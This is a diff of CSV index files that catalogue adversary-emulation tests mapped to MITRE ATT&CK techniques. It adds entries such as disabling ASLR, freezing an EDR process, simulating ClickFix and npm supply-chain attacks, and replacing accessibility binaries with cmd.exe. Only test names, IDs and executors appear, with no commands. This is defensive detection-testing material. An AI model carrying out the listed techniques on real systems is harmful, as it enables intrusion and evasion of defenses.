@@ -1521,6 +1531,7 @@ command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.e
|
||||
command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
|
||||
command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
|
||||
command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
|
||||
command-and-control,T1105,Ingress Tool Transfer,39,Curl Insecure Connection from a Pod,7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3,bash
|
||||
command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
|
||||
command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
|
||||
command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
|
||||
@@ -1850,6 +1861,10 @@ discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-85
|
||||
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
|
||||
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
|
||||
discovery,T1652,Device Driver Discovery,1,Device Driver Discovery,235b30a2-e5b1-441f-9705-be6231c88ddd,powershell
|
||||
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
|
||||
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
|
||||
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
|
||||
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
|
||||
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
|
||||
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
|
||||
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
|
||||
@@ -1912,6 +1927,10 @@ discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f
|
||||
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
|
||||
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
|
||||
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
|
||||
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
|
||||
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
|
||||
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
|
||||
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
|
||||
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
|
||||
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
@@ -2024,10 +2043,15 @@ discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery
|
||||
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
|
||||
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
|
||||
discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
|
||||
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
|
||||
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
|
||||
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
|
||||
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
|
||||
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
|
||||
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
|
||||
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
|
||||
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
|
||||
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
|
||||
discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
|
||||
discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
|
||||
@@ -2150,6 +2174,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
|
||||
impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
|
||||
impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
|
||||
impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
|
||||
impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
|
||||
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
|
||||
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
|
||||
impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
|
||||
@@ -2215,6 +2240,7 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
|
||||
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
|
||||
initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
|
||||
|
||||
|
@@ -125,6 +125,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
|
||||
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
|
||||
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
|
||||
@@ -331,6 +332,8 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
|
||||
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
|
||||
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
|
||||
discovery,T1652,Device Driver Discovery,2,Device Driver Discovery (Linux),d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1,bash
|
||||
discovery,T1652,Device Driver Discovery,3,Enumerate Kernel Driver Files (Linux),13c0fef5-9be9-4d7f-9c6b-901624e53770,bash
|
||||
discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
|
||||
discovery,T1087.002,Account Discovery: Domain Account,24,Account Enumeration with LDAPDomainDump,a54d497e-8dbe-4558-9895-44944baa395f,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
|
||||
@@ -343,6 +346,7 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtu
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
|
||||
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
|
||||
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl/service,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
|
||||
discovery,T1007,System Service Discovery,8,System Service Discovery - Linux init scripts,8f2a5d2b-4018-46d4-8f3f-0fea53754690,sh
|
||||
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
|
||||
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
|
||||
@@ -367,7 +371,10 @@ discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON
|
||||
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
|
||||
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
|
||||
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
|
||||
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
|
||||
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
|
||||
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1049,System Network Connections Discovery,6,"System Network Connections Discovery via sockstat (Linux, FreeBSD)",997bb0a6-421e-40c7-b5d2-0f493904ef9b,sh
|
||||
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
|
||||
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
|
||||
@@ -425,6 +432,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
|
||||
impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
|
||||
impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
|
||||
impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
|
||||
impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
|
||||
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
|
||||
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
|
||||
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
|
||||
@@ -442,6 +450,7 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
|
||||
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
|
||||
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
|
||||
impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
|
||||
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
|
||||
|
||||
|
@@ -221,6 +221,8 @@ credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spo
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
|
||||
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
|
||||
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
|
||||
discovery,T1652,Device Driver Discovery,4,List loaded kernel extensions (macOS),71eab73d-5d7d-4681-9a72-7873489a5b85,bash
|
||||
discovery,T1652,Device Driver Discovery,5,Find Kernel Extensions (macOS),c63bbe52-6f17-4832-b221-f07ba8b1736f,bash
|
||||
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
|
||||
@@ -230,6 +232,7 @@ discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtu
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
|
||||
discovery,T1007,System Service Discovery,5,System Service Discovery - macOS launchctl,9b378962-a75e-4856-b117-2503d6dcebba,sh
|
||||
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
|
||||
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
|
||||
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
|
||||
@@ -248,7 +251,8 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
|
||||
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
|
||||
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
|
||||
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
|
||||
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1049,System Network Connections Discovery,4,System Network Connections Discovery via ss or lsof (Linux/MacOS),bcf05343-ef1d-4052-8a27-b00c9be42b9f,bash
|
||||
discovery,T1049,System Network Connections Discovery,5,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
|
||||
discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
|
||||
|
||||
|
@@ -105,6 +105,7 @@ defense-evasion,T1202,Indirect Command Execution,4,Indirect Command Execution -
|
||||
defense-evasion,T1202,Indirect Command Execution,5,Indirect Command Execution - RunMRU Dialog,de323a93-2f18-4bd5-ba60-d6fca6aeff76,powershell
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
|
||||
defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
|
||||
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
|
||||
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
|
||||
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
|
||||
@@ -379,6 +380,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
|
||||
@@ -577,6 +579,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
|
||||
@@ -702,6 +705,7 @@ execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Down
|
||||
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
|
||||
execution,T1204.002,User Execution: Malicious File,13,Simulate Click-Fix via Downloaded BAT File,22386853-f68d-4b50-a362-de235127c443,powershell
|
||||
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
|
||||
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
|
||||
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
|
||||
@@ -933,6 +937,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
@@ -1324,6 +1329,8 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directo
|
||||
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
|
||||
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
|
||||
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
|
||||
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
|
||||
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
|
||||
discovery,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
|
||||
discovery,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
|
||||
discovery,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
|
||||
@@ -1398,9 +1405,11 @@ discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (Pow
|
||||
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
|
||||
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
|
||||
